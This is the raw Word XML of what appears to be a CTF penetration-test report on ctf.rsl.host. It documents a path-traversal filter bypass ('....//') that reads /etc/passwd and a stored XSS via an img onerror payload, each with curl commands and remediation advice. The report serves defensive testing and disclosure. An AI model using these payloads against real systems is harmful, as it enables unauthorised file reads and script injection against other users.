      <w:r w:rsidRPr="008C2BC7">
        <w:t>/ High / Medium / Low]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE661F6" w14:textId="77777777" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30490AB0" w14:textId="5D560F3F" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="00127EA0" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00127EA0">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EA0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/data</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EA0">
        <w:t xml:space="preserve"> endpoint contains a path traversal vulnerability that allows reading arbitrary files from the server filesystem. While basic </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EA0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>../</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EA0">
        <w:t xml:space="preserve"> sequences are filtered, the protection can be bypassed using </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EA0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>....//</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EA0">
        <w:t xml:space="preserve"> double-dot encoding. This vulnerability enables access to sensitive system files including </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EA0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EA0">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EA0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/etc/shadow</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EA0">
        <w:t>, and potentially application source code and configuration files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2BC020" w14:textId="77777777" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16757D92" w14:textId="77777777" w:rsidR="008A6F48" w:rsidRDefault="008A6F48" w:rsidP="008A6F48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Implement proper input validation and sanitization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345F12A5" w14:textId="77777777" w:rsidR="008A6F48" w:rsidRDefault="008A6F48" w:rsidP="008A6F48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use allowlisting instead of denylisting for file access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5B1E28" w14:textId="77777777" w:rsidR="008A6F48" w:rsidRDefault="008A6F48" w:rsidP="008A6F48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Employ secure file access APIs that prevent directory traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A0B2AE" w14:textId="77777777" w:rsidR="008A6F48" w:rsidRDefault="008A6F48" w:rsidP="008A6F48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Implement proper access controls and file system permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127682B0" w14:textId="2FD74BD3" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6F48" w:rsidP="008A6F48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use chroot jails or containers to limit file system access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6780658A" w14:textId="77777777" w:rsidR="008A6460" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>Testing Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AAA91F" w14:textId="77777777" w:rsidR="00627948" w:rsidRDefault="00627948" w:rsidP="00627948">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tested normal functionality: </w:t>
      </w:r>
      <w:r w:rsidRPr="00627948">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>curl -X POST https://ctf.rsl.host/data -d "data_source=rhino"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1926F663" w14:textId="77777777" w:rsidR="00627948" w:rsidRDefault="00627948" w:rsidP="00627948">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attempted basic traversal (blocked): </w:t>
      </w:r>
      <w:r w:rsidRPr="00627948">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>curl -X POST https://ctf.rsl.host/data -d "data_source=../../../etc/passwd"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C6EB91" w14:textId="77777777" w:rsidR="00627948" w:rsidRDefault="00627948" w:rsidP="00627948">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bypassed protection: </w:t>
      </w:r>
      <w:r w:rsidRPr="00627948">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>curl -X POST https://ctf.rsl.host/data -d "data_source=....//....//....//etc//passwd"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0BBE7A" w14:textId="5B03FE3F" w:rsidR="00627948" w:rsidRDefault="00627948" w:rsidP="00627948">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Successfully accessed </w:t>
      </w:r>
      <w:r w:rsidRPr="00627948">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t>, and other system files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66351A99" w14:textId="11FB7185" w:rsidR="00EC5267" w:rsidRPr="008C2BC7" w:rsidRDefault="00635B4C" w:rsidP="00EC5267">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="763EA87F" wp14:editId="49D4663E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>561109</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3075709</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3221182" cy="263236"/>
                <wp:effectExtent l="19050" t="19050" r="17780" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="709054909" name="Rectangle 33"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3221182" cy="263236"/>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AA32E" id="Rectangle 33" o:spid="_x0000_s1026" style="position:absolute;margin-left:44.2pt;margin-top:242.2pt;width:253.65pt;height:20.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" filled="f" strokecolor="#e00" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="516B4566" wp14:editId="416D7D4F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3380509</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>173182</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2466109" cy="297873"/>
                <wp:effectExtent l="19050" t="19050" r="10795" b="26035"/>
                <wp:wrapNone/>
                <wp:docPr id="258383191" name="Rectangle 32"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2466109" cy="297873"/>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C245F" id="Rectangle 32" o:spid="_x0000_s1026" style="position:absolute;margin-left:266.2pt;margin-top:13.65pt;width:194.2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" filled="f" strokecolor="#e00" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00EC5267">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EED7AEB" wp14:editId="39A38D58">
            <wp:extent cx="5943600" cy="3765550"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="36444973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9739" name="Picture 1" descr="A computer screen shot of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3765550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CF78CA" w14:textId="6A20DDC6" w:rsidR="008A6460" w:rsidRDefault="0080305F" w:rsidP="003E1766">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="09E8E2DA" wp14:editId="3EA1302C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3110345</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>131618</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2937164" cy="290946"/>
                <wp:effectExtent l="19050" t="19050" r="15875" b="13970"/>
                <wp:wrapNone/>
                <wp:docPr id="2081172426" name="Rectangle 34"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2937164" cy="290946"/>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B4D21" id="Rectangle 34" o:spid="_x0000_s1026" style="position:absolute;margin-left:244.9pt;margin-top:10.35pt;width:231.25pt;height:22.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" filled="f" strokecolor="#e00" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="001A63EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A15286F" wp14:editId="5752EF5B">
            <wp:extent cx="5936615" cy="5583555"/>
            <wp:effectExtent l="95250" t="95250" r="102235" b="93345"/>
            <wp:docPr id="16737593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5583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56333C" w14:textId="56585277" w:rsidR="001A63EB" w:rsidRDefault="001A63EB" w:rsidP="003E1766">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F7CC4FE" wp14:editId="484281AD">
            <wp:extent cx="3609340" cy="1447800"/>
            <wp:effectExtent l="95250" t="95250" r="86360" b="95250"/>
            <wp:docPr id="16595374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340" cy="1447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AAE1E2" w14:textId="36299D1D" w:rsidR="001A63EB" w:rsidRDefault="001A63EB" w:rsidP="003E1766">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A490AD8" wp14:editId="298E9F6A">
            <wp:extent cx="5929630" cy="706755"/>
            <wp:effectExtent l="95250" t="95250" r="90170" b="93345"/>
            <wp:docPr id="10080738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9630" cy="706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BC89F7" w14:textId="77777777" w:rsidR="00EA03F7" w:rsidRDefault="00EA03F7" w:rsidP="00C27D27"/>
    <w:p w14:paraId="0ABD32BF" w14:textId="77777777" w:rsidR="0099625A" w:rsidRDefault="0099625A" w:rsidP="00C27D27"/>
    <w:p w14:paraId="08625E79" w14:textId="77777777" w:rsidR="0099625A" w:rsidRDefault="0099625A" w:rsidP="00C27D27"/>
    <w:p w14:paraId="626AC225" w14:textId="77777777" w:rsidR="0099625A" w:rsidRDefault="0099625A" w:rsidP="00C27D27"/>
    <w:p w14:paraId="04DB7046" w14:textId="77777777" w:rsidR="0099625A" w:rsidRDefault="0099625A" w:rsidP="00C27D27"/>
    <w:p w14:paraId="4788A101" w14:textId="77777777" w:rsidR="0099625A" w:rsidRDefault="0099625A" w:rsidP="00C27D27"/>
    <w:p w14:paraId="028FA0FC" w14:textId="77777777" w:rsidR="0099625A" w:rsidRDefault="0099625A" w:rsidP="00C27D27"/>
    <w:p w14:paraId="6492E2A1" w14:textId="77777777" w:rsidR="0099625A" w:rsidRDefault="0099625A" w:rsidP="00C27D27"/>
    <w:p w14:paraId="7ECE1E46" w14:textId="77777777" w:rsidR="0099625A" w:rsidRDefault="0099625A" w:rsidP="00C27D27"/>
    <w:p w14:paraId="0C62592C" w14:textId="77777777" w:rsidR="0099625A" w:rsidRDefault="0099625A" w:rsidP="00C27D27"/>
    <w:p w14:paraId="0ADEF8A7" w14:textId="77777777" w:rsidR="0099625A" w:rsidRDefault="0099625A" w:rsidP="00C27D27"/>
    <w:p w14:paraId="420CAA46" w14:textId="77777777" w:rsidR="0099625A" w:rsidRDefault="0099625A" w:rsidP="00C27D27"/>
    <w:p w14:paraId="75201B89" w14:textId="77777777" w:rsidR="0099625A" w:rsidRDefault="0099625A" w:rsidP="00C27D27"/>
    <w:p w14:paraId="407FD557" w14:textId="77777777" w:rsidR="0099625A" w:rsidRDefault="0099625A" w:rsidP="00C27D27"/>
    <w:p w14:paraId="3BB11142" w14:textId="77777777" w:rsidR="0099625A" w:rsidRDefault="0099625A" w:rsidP="00C27D27"/>
    <w:p w14:paraId="180D883E" w14:textId="77777777" w:rsidR="0099625A" w:rsidRDefault="0099625A" w:rsidP="00C27D27"/>
    <w:p w14:paraId="102FE3DF" w14:textId="77777777" w:rsidR="0099625A" w:rsidRDefault="0099625A" w:rsidP="00C27D27"/>
    <w:p w14:paraId="3FE69532" w14:textId="77777777" w:rsidR="0099625A" w:rsidRDefault="0099625A" w:rsidP="00C27D27"/>
    <w:p w14:paraId="08F493E5" w14:textId="77777777" w:rsidR="0099625A" w:rsidRDefault="0099625A" w:rsidP="00C27D27"/>
    <w:p w14:paraId="398CC5E0" w14:textId="77777777" w:rsidR="0099625A" w:rsidRDefault="0099625A" w:rsidP="00C27D27"/>
    <w:p w14:paraId="73E8DCE3" w14:textId="77777777" w:rsidR="0099625A" w:rsidRDefault="0099625A" w:rsidP="00C27D27"/>
    <w:p w14:paraId="03C09C91" w14:textId="77777777" w:rsidR="0099625A" w:rsidRDefault="0099625A" w:rsidP="00C27D27"/>
    <w:p w14:paraId="1D99ACF8" w14:textId="77777777" w:rsidR="0099625A" w:rsidRPr="008C2BC7" w:rsidRDefault="0099625A" w:rsidP="00C27D27"/>
    <w:p w14:paraId="0044A15E" w14:textId="53231E02" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Name: </w:t>
      </w:r>
      <w:r w:rsidR="00F127AD" w:rsidRPr="00F127AD">
        <w:t>Stored XSS in Bio Field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EF3204" w14:textId="77777777" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t xml:space="preserve">Risk Rating: [Critical / </w:t>
      </w:r>
      <w:r w:rsidRPr="00B7643B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r w:rsidRPr="00B7643B">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>/ Medium / Low]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5EBD5C" w14:textId="77777777" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t xml:space="preserve">Exploitation Likelihood: [Critical / </w:t>
      </w:r>
      <w:r w:rsidRPr="00B7643B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r w:rsidRPr="00B7643B">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>/ Medium / Low]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F936EF4" w14:textId="77777777" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t xml:space="preserve">Potential Impact: [Critical / </w:t>
      </w:r>
      <w:r w:rsidRPr="00B7643B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r w:rsidRPr="00B7643B">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>/ Medium / Low]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66145C22" w14:textId="77777777" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361F67DB" w14:textId="0D10070F" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="005D2E0A" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2E0A">
        <w:t xml:space="preserve">The profile bio field stores user input without proper sanitization, creating a stored cross-site scripting (XSS) vulnerability. While </w:t>
      </w:r>
      <w:r w:rsidRPr="001A18D0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2E0A">
        <w:t xml:space="preserve"> tags are filtered, other HTML elements with event handlers like </w:t>
      </w:r>
      <w:r w:rsidRPr="001A18D0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&lt;img src=x onerror=alert('XSS')&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2E0A">
        <w:t xml:space="preserve"> are stored without modification. This allows attackers to inject malicious JavaScript that will execute when other users view the profile, potentially leading to session hijacking, credential theft, or further compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE01EC9" w14:textId="77777777" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E9D1A9" w14:textId="77777777" w:rsidR="001A18D0" w:rsidRDefault="001A18D0" w:rsidP="001A18D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Implement comprehensive input sanitization using a whitelist approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1CFD62" w14:textId="77777777" w:rsidR="001A18D0" w:rsidRDefault="001A18D0" w:rsidP="001A18D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use Content Security Policy (CSP) to prevent inline script execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C319342" w14:textId="77777777" w:rsidR="001A18D0" w:rsidRDefault="001A18D0" w:rsidP="001A18D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Apply proper output encoding when displaying user content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EB3214" w14:textId="77777777" w:rsidR="001A18D0" w:rsidRDefault="001A18D0" w:rsidP="001A18D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use established libraries like </w:t>
      </w:r>
      <w:r w:rsidRPr="000C575B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>DOMPurify</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for HTML sanitization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0A0A3E" w14:textId="1F8EAF93" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="001A18D0" w:rsidP="001A18D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Implement input validation on both client and server sides</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E37C4DC" w14:textId="215345EE" w:rsidR="008A6460" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>Testing Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5805D197" w14:textId="77777777" w:rsidR="004703B1" w:rsidRDefault="004703B1" w:rsidP="004703B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tested basic HTML injection: </w:t>
      </w:r>
      <w:r w:rsidRPr="004703B1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>curl -X POST https://ctf.rsl.host/profile -d "username=test&amp;bio=&lt;b&gt;test&lt;/b&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7246728E" w14:textId="77777777" w:rsidR="004703B1" w:rsidRDefault="004703B1" w:rsidP="004703B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Confirmed script tag filtering: </w:t>
      </w:r>
      <w:r w:rsidRPr="004703B1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>curl -X POST https://ctf.rsl.host/profile -d "username=test&amp;bio=&lt;script&gt;alert('XSS')&lt;/script&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A5B696" w14:textId="77777777" w:rsidR="004703B1" w:rsidRDefault="004703B1" w:rsidP="004703B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bypassed with img tag: </w:t>
      </w:r>
      <w:r w:rsidRPr="004703B1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>curl -X POST https://ctf.rsl.host/profile -d "username=test&amp;bio=&lt;img src=x onerror=alert('XSS')&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1BB9BE" w14:textId="575A5BDA" w:rsidR="004703B1" w:rsidRPr="008C2BC7" w:rsidRDefault="004703B1" w:rsidP="004703B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Verified payload storage and potential execution in browser context</w:t>
      </w:r>
    </w:p>
